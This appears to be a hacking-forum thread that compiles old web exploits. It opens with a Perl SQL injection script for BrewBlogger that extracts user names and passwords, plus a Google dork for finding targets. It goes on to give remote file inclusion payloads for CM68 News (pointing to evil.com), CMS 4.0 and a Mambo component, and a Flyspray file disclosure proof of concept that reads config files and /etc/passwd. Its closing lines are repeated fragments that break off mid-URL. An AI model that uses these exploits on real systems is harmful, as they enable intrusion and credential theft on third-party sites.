# # BrewBlogger does not properly sanitize the 'id=' parameter passed to pri ntLog.php. # Since each user entry contains an auto- incrementing ID number, it is possible to # enumerate all user names and passwords stored in the 'users'database by iterating # through every possible ID number. # #Vulnerable Code (truncated): # # $colname_log = (get_magic_quotes_gpc()) ? $_GET['id'] : addslashes($ _GET['id']); # $query_log = sprintf("SELECT * FROM brewing WHERE id = %s", $c olname_log); # $log = mysql_query($query_log, $brewing) or die(mysql_error()); # #Usage: # This script will produce a URL which will reveal the user name and pas sword for # the specified ID. If no ID is specified, 2 is used (seems to be the usual I D for # the first user). The user name will be listed as "Method:" under 'General # Information', and the password will be listed as "Cost:". # #Usage: # ./brewblog.pl <domain name + path> [user id] # #Examples: # # ./brewblogger.pl www.beerblog.com 3 # ./brewblogger.pl www.mysite.com/beerblog # #Google Dork: # # intext:"BrewBlogger for PHP" # #Discovery/code: # # Craig Heffner # heffnercj [at] gmail.com # http://www.craigheffner.com ############################################################## ############################# print ' ########################################### # BrewBlogger 1.3.1 SQL Injection Exploit # # # # Discovered and coded by: Craig Heffner # ########################################### '; if(!$ARGV[0] || $ARGV[0] eq "-h"){ print "\nUsage: ./brewlogger.pl <domain name + path> [user id]\n\nSee s cript comments for more details\n"; exit; } if(!$ARGV[1]){ $id = 2; } else { $id = $ARGV[1]; } $url = "http://" . $ARGV[0] . "/printLog.php?id=0+UNION+SELECT+"; $a = 1; while($a < 211){ if($a == 8){ $string .= "user_name,"; } elsif($a == 9){ $string .= "password,"; } elsif($a == 210){ $string .= "1"; } else { $string .= "1,"; } $a++; } print "\n\nUse the following URL:\n\n" . $url . $string . "+FROM+users+WH ERE+id=" . $id . "\n"; exit; Black_hat_cr(HCE) bug của IPB từ A-Z Code: http://www.osvdb.org/searchdb.php?action=search_title&vuln_title=invision&Sear ch=Search Black_hat_cr(HCE) bug của phpbb từ A-Z Code: http://www.osvdb.org/searchdb.php?action=search_title&vuln_title=phpbb&Searc h=Search Black_hat_cr(HCE) CM68 News <= 12.02.06 (addpth) Remote File Inclusion Vulnerability Code: Vulnerable Software:cm68news Vulnerable file: /engine/oldnews.inc.php Credits: Paul Bakoyiannis Vulnerable Variable: addpath Example Exploit: http://site.com/cm68news/engine/oldnews.inc.php?addpath=http://evil.com/script.t xt?& Black_hat_cr(HCE) CMS 4.0 Multiple Remote File Include Vulnerabilities Code: http://www.example.com/[path]/index.php?DIR_PLUGINS=[shell_script] http://www.example.com/[path]/install.php?DIR_LIBS=[shell_script] http://www.example.com/[path]/admin/libs/ADMIN.php?DIR_LIBS=[shell_script] http://www.example.com/[path]/admin/libs/globalfunctions.php?DIR_LIBS=[shell _script] http://www.example.com/[path]/admin/libs/MEMBER.php?DIR_LIBS=[shell_scri pt] http://www.example.com/[path]/admin/libs/PLUGINADMIN.php?DIR_LIBS=[sh ell_script] http://www.example.com/[path]/admin/libs/SKIN.php?DIR_LIBS=[shell_script] Black_hat_cr(HCE) com_flyspray Mambo Com. <= 1.0.1 Remote File Disclosure Vulnerability Code: ****************************************************************** *********************************************************** Compononent name:com_flyspray Affected Version:1.0.1 d.page:http://mamboxchange.com/frs/download.php/8304/com_flyspray_1.0.1.zip ****************************************************************** *********************************************************** Authour: Dr Max Virus Location:Egypt ****************************************************************** *********************************************************** Bug in :startdown.php Vul Code: In Line 52: readfile($file); Problem:The variable of file not sanitized So u can read any file on server and also config file ****************************************************************** *********************************************************** POC: http://[target]/[joomla_path]/components/com_flyspray/startdown.php?file=config. inc.php http://[target]/[joomla_path]/components/com_flyspray/startdown.php?file= / / / / /etc/passwd%00 ****************************************************************** *********************************************************** Black_hat_cr(HCE) com_loudmouth Mambo Component <= 4.0j Include Vulnerability Bug Found by h4ntu [http://h4ntu.com] #batamhacker crew Another Mambo component remote inclusion vulneribility download : http://mamboxchange.com/frs/download mouth-4.0j.zip bug found in file abbc.class.php : include( $GLOBALS['mosConfig_absolute_path'].'/components/com_loudmouth/includes/a bbc/abbc.config.php'); http://[site]/[path]/components/com_loudmounth/includes/abbc/abbc.class.php? mosConfig_absolute_path=[attacker] Greetz : Baylaw, Reel, JoySolutions, K-159, SaMuR4i_X, SolpoT, Nugelo, and all #batamhacker [at] dalnet crew, #mardongan, #motha, #papmahackerlink Black_hat_cr(HCE) . Baylaw, Reel, JoySolutions, K-159, SaMuR4i_X, SolpoT, Nugelo, and all #batamhacker [at] dalnet crew, #mardongan, #motha, #papmahackerlink Black_hat_cr(HCE) . Mambo Component <= 4.0j Include Vulnerability Bug Found by h4ntu [http://h4ntu.com] #batamhacker crew Another Mambo component remote inclusion vulneribility download : http://mamboxchange.com/frs/download